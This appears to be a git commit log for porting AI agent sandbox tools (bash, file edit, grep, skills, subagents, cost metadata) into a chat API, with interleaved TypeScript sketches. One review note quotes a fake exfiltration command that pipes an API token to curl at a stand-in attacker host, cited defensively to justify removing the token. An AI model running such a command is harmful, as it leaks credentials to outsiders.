37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds.
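A self-contained sketch of the two ideas in this commit pair, using an in-memory row instead of Supabase: a discriminated CAS result narrowed with the `in` operator, and splitting a `where` map into equality matches plus `IS NULL` columns. `ChatRow`, `compareAndSetActiveStreamId`, `describeCasResult`, and `splitWhere` are hypothetical names; only the result shape and the `.match()` / `.is()` split come from the description above.

```typescript
type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

interface ChatRow {
  id: string;
  active_stream_id: string | null;
}

// In-memory stand-in for an UPDATE guarded by `active_stream_id = expected` (or IS NULL).
function compareAndSetActiveStreamId(row: ChatRow, expected: string | null, next: string | null): CasResult {
  if (row.active_stream_id !== expected) return { ok: true, claimed: false }; // race lost
  row.active_stream_id = next;
  return { ok: true, claimed: true };
}

// `"error" in result` narrows to the failure member without relying on literal `ok` inference.
function describeCasResult(result: CasResult): string {
  if ("error" in result) return `db error: ${result.error}`;
  return result.claimed ? "claimed" : "race lost";
}

type WhereValue = string | number | boolean | null;

// Null entries become `.is(column, null)` filters; everything else goes into one `.match()` object.
function splitWhere(where: Record<string, WhereValue>): {
  matches: Record<string, string | number | boolean>;
  nullColumns: string[];
} {
  const matches: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) nullColumns.push(column);
    else matches[column] = value;
  }
  return { matches, nullColumns };
}
```

In the sequence the handler follows, a first CAS claims a `pending-<uuid>` placeholder before `start()`, and a second CAS keyed on that placeholder promotes it to the real `wrun_` ID; a concurrent request sees `claimed: false` and can answer 409.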
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. This proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts: AgentContext type, isAgentContext guard, and getSandbox(), which reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts: builds the { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env from context.
- lib/agent/tools/bashTool.ts: direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects the Recoup env on foreground execs only (detached processes outlive the prompt, so they get no token).
- lib/agent/buildAgentTools.ts: factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes it into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration; no outer loop in runAgentWorkflow is needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, and passes it to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR; host-side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (this subsumes the cubic P1 about the broken override ordering, since the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files, with no catch-all utils file:
  - `AgentContext.ts`: type
  - `isAgentContext.ts`: guard
  - `getSandbox.ts`: sandbox reconnection

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived API key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token; only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate that sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. The earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above.
- P2 (test file >100 lines): dismissed, same as in the PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines.

Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds.
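A sketch of the tightened guard from the P2 fix, assuming the context carries `sandbox.state` and `sandbox.workingDirectory` as described; `AgentContextShape` and `isRecord` are illustrative names, and the real AgentContext has more fields than this.

```typescript
interface AgentContextShape {
  sandbox: { state: object; workingDirectory: string };
}

// Non-null objects only (typeof null === "object", so exclude it explicitly).
function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

function isAgentContext(value: unknown): value is AgentContextShape {
  if (!isRecord(value)) return false;
  const sandbox = value["sandbox"];
  if (!isRecord(sandbox)) return false;
  const state = sandbox["state"];
  const workingDirectory = sandbox["workingDirectory"];
  // Reject `{ sandbox: {} }` up front instead of letting a tool crash on undefined fields later.
  return isRecord(state) && typeof workingDirectory === "string" && workingDirectory.length > 0;
}
```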
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restores the streamText stop condition so the workflow agent gets the model's wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:
- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. It inherits the value /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55): high enough that normal flows never hit the cap, but still bounding runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant and passes it to streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`; they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.
New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts: read with 1-indexed offset/limit, numbered output
- writeFileTool.ts: create / overwrite (with mkdir -p) via sandbox.writeFile
- editFileTool.ts: exact-string replace, ambiguous-match rejection
- grepTool.ts: POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts: `find -printf` with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts: stateless planning surface; echoes the list back
- webFetchTool.ts: curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts: single-quote escaping (the `'` → `'\''` dance)
- toDisplayPath.ts: absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per a PR 585 review question: most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents, where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in the PR 4 review). The AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:
- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).
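The two shared helpers from this PR can be sketched as follows. This assumes POSIX paths inside the sandbox (hence `path.posix`) and that paths outside the working directory are shown unchanged; returning `.` for the working directory itself is an assumption, not documented behavior.

```typescript
import * as path from "node:path";

// Wrap in single quotes; each embedded ' becomes '\'' (close quote, escaped quote, reopen).
export function shellEscape(value: string): string {
  return `'${value.replace(/'/g, "'\\''")}'`;
}

// Show paths inside the working directory relative to it; leave everything else absolute.
export function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const relative = path.posix.relative(workingDirectory, absolutePath);
  if (relative === "") return ".";
  if (relative === ".." || relative.startsWith("../") || path.posix.isAbsolute(relative)) {
    return absolutePath;
  }
  return relative;
}
```

A command such as `grep -rn -E <pattern> <dir>` would interpolate both arguments through shellEscape, so a pattern containing `'` cannot break out of its quoting.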
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty, so models in sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts: SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts: hand-rolled YAML subset parser (key: value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts: strip frontmatter, return the body
- substituteArguments.ts: $ARGUMENTS replacement
- injectSkillDirectory.ts: prepend `Skill directory: <path>`
- discoverSkills.ts: scan dirs, parse frontmatter, dedupe by name, drop names that shadow the built-ins /model, /resume, /new
- getSandboxSkillDirectories.ts: slim, `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting

New tool: lib/agent/tools/skillTool.ts. It does a case-insensitive lookup, respects `disable-model-invocation`, and surfaces the available-skills list on an unknown name. It loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, and returns the result to the model.
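A compact sketch of the frontmatter-and-body pipeline, assuming `---`-delimited frontmatter at the top of SKILL.md, a blank line after the injected `Skill directory:` header, and plain string replacement for `$ARGUMENTS`. It handles only the YAML subset named above (key: value, quoted strings, booleans) and is not the real parser; schema validation via skillFrontmatterSchema is omitted.

```typescript
type FrontmatterValue = string | boolean;

// Leading `---` block; the lazy capture stops at the first closing `---` line.
const FRONTMATTER_BLOCK = /^---\r?\n([\s\S]*?)\r?\n---(?:\r?\n|$)/;

function parseSkillFrontmatter(content: string): Record<string, FrontmatterValue> {
  const result: Record<string, FrontmatterValue> = {};
  const block = FRONTMATTER_BLOCK.exec(content)?.[1];
  if (!block) return result;
  for (const line of block.split(/\r?\n/)) {
    const colon = line.indexOf(":");
    if (colon <= 0) continue; // not a key: value line
    const key = line.slice(0, colon).trim();
    // Split on the FIRST colon only, so values like URLs keep their own colons.
    let raw = line.slice(colon + 1).trim();
    if (raw === "true" || raw === "false") {
      result[key] = raw === "true";
      continue;
    }
    const quote = raw.charAt(0);
    if (raw.length >= 2 && (quote === '"' || quote === "'") && raw.endsWith(quote)) {
      raw = raw.slice(1, -1); // strip matching surrounding quotes
    }
    result[key] = raw;
  }
  return result;
}

function extractSkillBody(content: string): string {
  return content.replace(FRONTMATTER_BLOCK, "").trim();
}

function injectSkillDirectory(body: string, directory: string): string {
  return `Skill directory: ${directory}\n\n${body}`;
}

// split/join sidesteps String.replace's special `$` patterns in replacement text.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}
```

The order matters: the body is extracted first so frontmatter never reaches the model, and arguments are substituted last so a `$ARGUMENTS` token in the injected header line (unlikely, but possible in a path) is treated the same as one in the body.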
Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }` and registers the skill tool when non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects the sandbox and runs discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting. The recoup-api skill would still load and return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs. server-minted JWT scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at `${workingDirectory}/skills/`, a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):
- `${workingDirectory}/.claude/skills/` (project, claude-style)
- `${workingDirectory}/.agents/skills/` (project, agents-style)
- `${HOME}/.agents/skills/` (global; populated at provisioning by installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad hoc until proper token minting lands.
Changes:
- getSandboxSkillDirectories is now async: it uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME (defaults to /root)
- Exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents, proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup; org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path, `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array.
2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit:
- Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
- Agent invoked `skill({ skill: "recoup-api" })` successfully and received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header

Full suite 3055/3055; lint clean; production build succeeds.
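A sketch of the single-path resolution after the YAGNI change, assuming the home directory comes from an injected async resolver (a hypothetical stand-in for resolveSandboxHomeDirectory) and falls back to `/root` as described above. The trailing-slash trimming is one way to get the tolerance that the getGlobalSkillsDirectory tests cover; the real implementation may differ.

```typescript
// Hypothetical stand-in for resolveSandboxHomeDirectory.
type HomeResolver = () => Promise<string | undefined>;

const DEFAULT_SANDBOX_HOME = "/root";

// `${HOME}/.agents/skills`, tolerating trailing slashes on HOME.
function getGlobalSkillsDirectory(home: string): string {
  return `${home.replace(/\/+$/, "")}/.agents/skills`;
}

// Skills are installed globally at provisioning, so there is exactly one directory to scan.
async function getSandboxSkillDirectories(resolveHome: HomeResolver): Promise<string[]> {
  const home = (await resolveHome()) || DEFAULT_SANDBOX_HOME;
  return [getGlobalSkillsDirectory(home)];
}
```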
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite:
- lib/skills/findSkillFile.ts (was inlined in discoverSkills.ts)
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts (was inlined in getSandboxSkillDirectories.ts)
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile, and getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts): a client-side tool with NO server execute. Its schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts): a slim port of open-agents' multi-type SUBAGENT_REGISTRY, collapsed into one generic subagent. It runs a sub-`streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent.
The subagent tool set deliberately EXCLUDES:
- task (recursion guard: open-agents' three subagent types, executor/explorer/design, all explicitly omit task too; subagents are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, and don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. The handler populates it from chat.model_id or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError, surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:
- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId; it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it.

Also format-fixes the askUserQuestionTool.ts toModelOutput arrow (parentheses around a single param, flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID):
- AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce `DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">` for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context, the same pattern as open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID and calls getSubagentModel(experimental_context, "task") instead, so the subagent now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence.
Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.
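Here is a minimal sketch of the per-turn accumulation that buildMessageMetadataCallback is described as doing. It assumes simplified part shapes: the `StreamPart` union, the pre-parsed `cost` field and `addOptional` are illustrative stand-ins, not the AI SDK's or this repo's actual types. The factory keeps its accumulators in a closure, so each call returns a callback that starts from zero for a new turn.

```typescript
// Simplified stand-ins for the SDK types (assumption: only these fields are modeled).
interface StepUsage {
  inputTokens?: number;
  outputTokens?: number;
}

type StreamPart =
  | { type: "start" }
  | {
      type: "finish-step";
      usage: StepUsage;
      finishReason: string;
      cost?: number; // hypothetical: per-step cost already parsed from providerMetadata
    };

interface MessageMetadata {
  modelId: string;
  lastStepUsage?: StepUsage;
  totalMessageUsage?: StepUsage;
  lastStepCost?: number;
  totalMessageCost?: number;
  stepFinishReasons: string[];
}

// Sum two optional counts; "unknown + unknown" stays unknown.
function addOptional(a?: number, b?: number): number | undefined {
  return a === undefined && b === undefined ? undefined : (a ?? 0) + (b ?? 0);
}

function buildMessageMetadataCallback(modelId: string) {
  // Accumulators live in this closure, so every new callback starts empty.
  let lastStepUsage: StepUsage | undefined;
  let totalMessageUsage: StepUsage | undefined;
  let lastStepCost: number | undefined;
  let totalMessageCost: number | undefined;
  const stepFinishReasons: string[] = [];

  return ({ part }: { part: StreamPart }): MessageMetadata => {
    if (part.type === "finish-step") {
      lastStepUsage = part.usage;
      totalMessageUsage = {
        inputTokens: addOptional(totalMessageUsage?.inputTokens, part.usage.inputTokens),
        outputTokens: addOptional(totalMessageUsage?.outputTokens, part.usage.outputTokens),
      };
      lastStepCost = part.cost;
      totalMessageCost = addOptional(totalMessageCost, part.cost);
      stepFinishReasons.push(part.finishReason);
    }
    // Return a copy of the reasons so callers cannot mutate internal state.
    return {
      modelId,
      lastStepUsage,
      totalMessageUsage,
      lastStepCost,
      totalMessageCost,
      stepFinishReasons: [...stepFinishReasons],
    };
  };
}
```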
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim:
- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
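The pointwise sum behind addLanguageModelUsage and addTokenCounts can be sketched as follows. `FlatUsage` is a hypothetical, trimmed-down stand-in for the SDK's flat `LanguageModelUsage` (top-level `inputTokens` plus nested `inputTokenDetails`). The cache field names, and the choice to keep `undefined + undefined` as `undefined`, are assumptions rather than confirmed behavior of the ported code.

```typescript
// Hypothetical trimmed-down flat usage shape; field names beyond
// inputTokens/inputTokenDetails are assumptions.
interface FlatUsage {
  inputTokens?: number;
  outputTokens?: number;
  totalTokens?: number;
  inputTokenDetails?: {
    cacheReadTokens?: number;
    cacheWriteTokens?: number;
  };
}

function addTokenCounts(a: number | undefined, b: number | undefined): number | undefined {
  // Keep "unknown + unknown" as undefined instead of reporting a fake 0.
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

// Field-by-field sum, including the nested details object.
function addLanguageModelUsage(a: FlatUsage, b: FlatUsage): FlatUsage {
  return {
    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
    inputTokenDetails: {
      cacheReadTokens: addTokenCounts(
        a.inputTokenDetails?.cacheReadTokens,
        b.inputTokenDetails?.cacheReadTokens,
      ),
      cacheWriteTokens: addTokenCounts(
        a.inputTokenDetails?.cacheWriteTokens,
        b.inputTokenDetails?.cacheWriteTokens,
      ),
    },
  };
}
```

Because the new SDK already emits this flat shape, no normalization step is needed before summing.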

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator.
   Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's.

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor.

